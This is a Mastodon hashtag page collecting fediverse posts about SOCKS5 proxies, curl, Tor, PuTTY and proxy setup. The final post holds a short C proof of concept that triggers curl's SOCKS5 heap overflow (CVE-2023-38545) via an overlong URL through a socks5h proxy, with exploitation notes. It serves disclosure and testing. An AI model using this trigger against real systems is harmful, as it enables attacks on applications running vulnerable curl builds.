toad.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
Mastodon server operated by David Troy, a tech pioneer and investigative journalist addressing threats to democracy. Thoughtful participation and discussion welcome.

Administered by:

Server stats:

273
active users

#socks5

0 posts0 participants0 posts today
Paolo Melchiorre<p>TIL Network protocols Sans I/O ⚡</p><p>“… network protocol implementations written in Python that perform no I/O (this means libraries that operate directly on text or bytes; this excludes libraries that just abstract out I/O).” 🤯</p><p>Read the reference page 👇<br><a href="https://sans-io.readthedocs.io/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">sans-io.readthedocs.io/</span><span class="invisible"></span></a></p><p><a href="https://fosstodon.org/tags/Reusability" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Reusability</span></a> <a href="https://fosstodon.org/tags/Python" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Python</span></a> <a href="https://fosstodon.org/tags/FastCGI" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FastCGI</span></a> <a href="https://fosstodon.org/tags/HTTP2" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HTTP2</span></a> <a href="https://fosstodon.org/tags/H11" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>H11</span></a> <a href="https://fosstodon.org/tags/IRC" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IRC</span></a> <a href="https://fosstodon.org/tags/OAuth2" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OAuth2</span></a> <a href="https://fosstodon.org/tags/OAuthLib" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OAuthLib</span></a> <a href="https://fosstodon.org/tags/WebSocket" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>WebSocket</span></a> <a href="https://fosstodon.org/tags/SOCKS5" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SOCKS5</span></a> <a href="https://fosstodon.org/tags/RFC2217" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RFC2217</span></a> <a href="https://fosstodon.org/tags/SerialOverIP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SerialOverIP</span></a> <a href="https://fosstodon.org/tags/EPICS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>EPICS</span></a> <a href="https://fosstodon.org/tags/FIX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FIX</span></a> <a href="https://fosstodon.org/tags/QUIC" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>QUIC</span></a> <a href="https://fosstodon.org/tags/LanguageServerProtocol" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LanguageServerProtocol</span></a> <a href="https://fosstodon.org/tags/SMTP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SMTP</span></a> <a href="https://fosstodon.org/tags/DBus" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DBus</span></a> <a href="https://fosstodon.org/tags/ThorlabsAPT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThorlabsAPT</span></a> <a href="https://fosstodon.org/tags/Matrix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Matrix</span></a> <a href="https://fosstodon.org/tags/SSL" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SSL</span></a> <a href="https://fosstodon.org/tags/TLS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>TLS</span></a> <a href="https://fosstodon.org/tags/CPython" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CPython</span></a> <a href="https://fosstodon.org/tags/multipart" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>multipart</span></a> <a href="https://fosstodon.org/tags/formdata" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>formdata</span></a></p>
Kevin Karhan :verified:<p><span class="h-card" translate="no"><a href="https://mastodon.social/@bagder" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>bagder</span></a></span> Problem with that is (besides occasional bugfixes), most people including myself would see <a href="https://infosec.space/tags/curl" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>curl</span></a> to be <em>functionally complete</em> and anything <em>"nice to have"</em> would be considered not worth the balooning in <a href="https://infosec.space/tags/complexity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>complexity</span></a> and <a href="https://infosec.space/tags/size" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>size</span></a>. </p><ul><li><p>I mean, does <a href="https://curl.se/" rel="nofollow noopener" target="_blank">curl</a> <em>need</em> to be able to do <a href="https://infosec.space/tags/BitTorrent" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BitTorrent</span></a> (magnet:), <a href="https://infosec.space/tags/IPFS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IPFS</span></a> (ipfs://) or god forbid <a href="https://infosec.space/tags/blockchain" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>blockchain</span></a> (i.e. <a href="https://infosec.space/tags/EVM" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>EVM</span></a>) support? </p></li><li><p>Do you really want to integrate <span class="h-card" translate="no"><a href="https://mastodon.social/@torproject" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>torproject</span></a></span> / <a href="https://infosec.space/tags/Tor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Tor</span></a> support <em>natively into curl</em> when using <a href="https://infosec.space/tags/HTTP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HTTP</span></a> (localhost:8118) and <a href="https://infosec.space/tags/SOCKS5" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SOCKS5</span></a> (localhost:9050) <a href="https://infosec.space/tags/proxy" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>proxy</span></a> allows for the same and doesn't necessitate having to handle and ingest Tor arguments as well??</p></li></ul><p>In fact if <a href="https://infosec.space/tags/toybox" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>toybox</span></a> didn't have a <a href="https://infosec.space/tags/wget" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>wget</span></a> implementation that I could use for OS/1337 I would've merely chosen <a href="https://curl.se/tiny/" rel="nofollow noopener" target="_blank"><code>tiny-curl -o</code></a> as a <a href="https://stackoverflow.com/questions/30702803/set-aliases-globally-for-all-users" rel="nofollow noopener" target="_blank">global alias</a> or if <a href="https://infosec.space/tags/tinycurl" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tinycurl</span></a> wasn't an option, <a href="https://linux.die.net/man/1/curl" rel="nofollow noopener" target="_blank"><code>curl -o</code></a> instead.</p><ul><li>Maybe someone who wants to have said functionality like <code>tor</code> support built-in will go and IDK make i.e. <code>#neocurl</code> or sth. along those lines or build something like <code>#ethcurl</code> or <code>#torcurl</code>or <code>#ipfscurl</code> or whatever...</li></ul><p>That being said I am glad <code>curl</code> isn't <em>solely</em> maintained by you but has other contributors (give them a shoutout!) but I also am glad you maintain that vital software that most <em>"<a href="https://infosec.space/tags/TechIlliterate" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>TechIlliterate</span></a> <a href="https://infosec.space/tags/Normies" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Normies</span></a>"</em> most likely never heard of but propably use on a daily basis as part of all the <a href="https://infosec.space/tags/tech" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tech</span></a> they use to <a href="https://infosec.space/tags/consume" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>consume</span></a> media with...</p><ul><li>I consider curl to be <em>"the <a href="https://infosec.space/tags/vim" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>vim</span></a> of downloaders"</em> (tho that's kinda insulting and limiting since <code>curl</code> is more than just a downloader <em>and</em> more intuitive than <code>vim</code>) with wget being <em>"the <a href="https://infosec.space/tags/vi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>vi</span></a> of downloaders"</em> (tho <code>wget</code> is even simpler to use than <code>vi</code>)...</li></ul><p>Either way, curl is awesome... </p><p><a href="https://infosec.space/tags/OS1337" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OS1337</span></a> <a href="https://infosec.space/tags/Enshittification" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Enshittification</span></a> <a href="https://infosec.space/tags/Bloat" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Bloat</span></a> <a href="https://infosec.space/tags/Bloatware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Bloatware</span></a></p>
DHeadshot's Alt<p>I tried my <a href="https://topspicy.social/tags/PuTTYTor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PuTTYTor</span></a> scripts on the newest versions of <a href="https://topspicy.social/tags/PuTTY" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PuTTY</span></a> and Tor today and I couldn't get them to work...<br>Turns out version 0.77 of PuTTY last year introduced a bug that stops <a href="https://topspicy.social/tags/DNS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DNS</span></a> (it's always DNS) lookup over the <a href="https://topspicy.social/tags/SOCKS5" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SOCKS5</span></a> <a href="https://topspicy.social/tags/Proxy" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Proxy</span></a> from working... 🙁 Reported.</p><p>They're now on 0.81 and it hadn't been noticed, surprising really...</p>
RTW<p>The "Profile" feature in <a href="https://mastodon.social/tags/Clash" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Clash</span></a> for <a href="https://mastodon.social/tags/Windows" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Windows</span></a> allows users to manage &amp; configure different settings related to their <a href="https://mastodon.social/tags/network" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>network</span></a> connections. </p><p>Users can set up profiles to define specific parameters like <a href="https://mastodon.social/tags/server" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>server</span></a> selection, protocols (<a href="https://mastodon.social/tags/HTTP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HTTP</span></a> and <a href="https://mastodon.social/tags/SOCKS5" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SOCKS5</span></a>) &amp; automatic startup connections. </p><p>This feature enables users to customize their network settings enhancing their control over how Clash for Windows interacts with different networks &amp; services. </p><p><a href="https://mastodon.social/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <br><a href="https://mastodon.social/tags/research" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>research</span></a><br><a href="https://mastodon.social/tags/technology" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>technology</span></a></p>
Kuketz-Blog 🛡<p>Besteht Interesse an einer Kurzanleitung, wie ein Browser den SOCKS5-Proxy von Mullvad nutzen kann, ohne dass der gesamte Traffic (also jede Anwendung) über das VPN getunnelt wird? Ziel ist: Nur den Browser über VPN tunneln, den Rest nicht. </p><p><a href="https://social.tchncs.de/tags/mullvad" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>mullvad</span></a> <a href="https://social.tchncs.de/tags/vpn" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>vpn</span></a> <a href="https://social.tchncs.de/tags/socks5" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>socks5</span></a> <a href="https://social.tchncs.de/tags/browser" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>browser</span></a></p>
Condor Puma Serpiente<p><span>For those to whom this may be useful:<br><br>Setting a SOCKS5 proxy in the terminal: </span></p><pre><code>ssh -D 8080 name@myserver.com export http_proxy="socks5://127.0.0.1:8080" export https_proxy="socks5://127.0.0.1:8080"</code></pre><span>or, alternatively<br></span><pre><code>export http_proxy="socks5://[proxy.server]:666" export https_proxy="socks5://[proxy.server]:666"</code></pre><a href="https://shark.distantserver.org/tags/linux" rel="nofollow noopener" target="_blank">#linux</a> <a href="https://shark.distantserver.org/tags/cli" rel="nofollow noopener" target="_blank">#cli</a> <a href="https://shark.distantserver.org/tags/comandline" rel="nofollow noopener" target="_blank">#comandline</a> <a href="https://shark.distantserver.org/tags/commandlinefu" rel="nofollow noopener" target="_blank">#commandlinefu</a> <a href="https://shark.distantserver.org/tags/proxy" rel="nofollow noopener" target="_blank">#proxy</a> <a href="https://shark.distantserver.org/tags/socks5" rel="nofollow noopener" target="_blank">#socks5</a><p></p>
Neustradamus :xmpp: :linux:<p><a href="https://mastodon.social/tags/curl" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>curl</span></a> 8.6.0 has been released (<a href="https://mastodon.social/tags/libcurl" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>libcurl</span></a> / <a href="https://mastodon.social/tags/Haxx" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Haxx</span></a> / <a href="https://mastodon.social/tags/DICT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DICT</span></a> / <a href="https://mastodon.social/tags/FILE" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FILE</span></a> / <a href="https://mastodon.social/tags/FTP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FTP</span></a> / <a href="https://mastodon.social/tags/FTPS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FTPS</span></a> / <a href="https://mastodon.social/tags/Gopher" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Gopher</span></a> / <a href="https://mastodon.social/tags/HTTP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HTTP</span></a> / <a href="https://mastodon.social/tags/HTTPS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HTTPS</span></a> / <a href="https://mastodon.social/tags/IMAP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IMAP</span></a> / <a href="https://mastodon.social/tags/IMAPS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IMAPS</span></a> / <a href="https://mastodon.social/tags/LDAP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LDAP</span></a> / <a href="https://mastodon.social/tags/LDAPS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LDAPS</span></a> / <a href="https://mastodon.social/tags/MQTT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MQTT</span></a> / <a href="https://mastodon.social/tags/POP3" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>POP3</span></a> / <a href="https://mastodon.social/tags/POP3S" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>POP3S</span></a> / <a href="https://mastodon.social/tags/RTMP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RTMP</span></a> / <a href="https://mastodon.social/tags/RTMPS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RTMPS</span></a> / <a href="https://mastodon.social/tags/RTSP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RTSP</span></a> / <a href="https://mastodon.social/tags/SCP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SCP</span></a> / <a href="https://mastodon.social/tags/SFTP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SFTP</span></a> / <a href="https://mastodon.social/tags/SMB" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SMB</span></a> / <a href="https://mastodon.social/tags/SMBS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SMBS</span></a> / <a href="https://mastodon.social/tags/SMTP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SMTP</span></a> / <a href="https://mastodon.social/tags/SMTPS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SMTPS</span></a> / <a href="https://mastodon.social/tags/Telnet" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Telnet</span></a> / <a href="https://mastodon.social/tags/TFTP" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>TFTP</span></a> / <a href="https://mastodon.social/tags/WebSocket" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>WebSocket</span></a> / <a href="https://mastodon.social/tags/SOCKS4" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SOCKS4</span></a> / <a href="https://mastodon.social/tags/SOCKS5" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SOCKS5</span></a> / <a href="https://mastodon.social/tags/SCRAM" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SCRAM</span></a> / <a href="https://mastodon.social/tags/TLS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>TLS</span></a> / <a href="https://mastodon.social/tags/HTTP2" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HTTP2</span></a> / <a href="https://mastodon.social/tags/HTTP3" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HTTP3</span></a>) <a href="https://curl.se/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">curl.se/</span><span class="invisible"></span></a></p>
postmodern<p>So how do you use SOCKSSocket? Documentation is pretty sparse.<br><a href="https://docs.ruby-lang.org/en/master/SOCKSSocket.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">docs.ruby-lang.org/en/master/S</span><span class="invisible">OCKSSocket.html</span></a><br><a href="https://ruby.social/tags/ruby" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ruby</span></a> <a href="https://ruby.social/tags/socks5" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>socks5</span></a></p>
Marco Ivaldi<p><a href="https://infosec.exchange/tags/curl" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>curl</span></a> <a href="https://infosec.exchange/tags/SOCKS5" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SOCKS5</span></a> <a href="https://infosec.exchange/tags/heap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>heap</span></a> buffer <a href="https://infosec.exchange/tags/overflow" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>overflow</span></a> CVE-2023-38545</p><p><a href="https://curl.se/docs/CVE-2023-38545.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">curl.se/docs/CVE-2023-38545.ht</span><span class="invisible">ml</span></a></p>

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht for more details.